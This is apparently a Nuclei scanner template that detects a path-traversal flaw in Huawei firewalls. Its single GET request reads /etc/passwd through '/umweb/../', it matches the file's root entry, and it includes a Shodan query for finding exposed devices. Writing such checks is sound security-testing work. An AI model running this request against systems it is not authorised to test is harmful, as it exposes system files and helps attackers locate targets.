id: huawei-firewall-lfi

info:
  name: Huawei Firewall - Local File Inclusion
  author: taielab
  severity: high
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"HUAWEI"
  tags: huawei,firewall,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502202e67b3a5c62f421b4fce08aeb8ccf6fdbd8c3050565f9191ecc7c45bf3161f1a022100c0d90961a359d1967ceea019ab83f6d54d819c91b73afa8fe6eced04f199ec96:922c64590222798bb761d5b6d8e72950
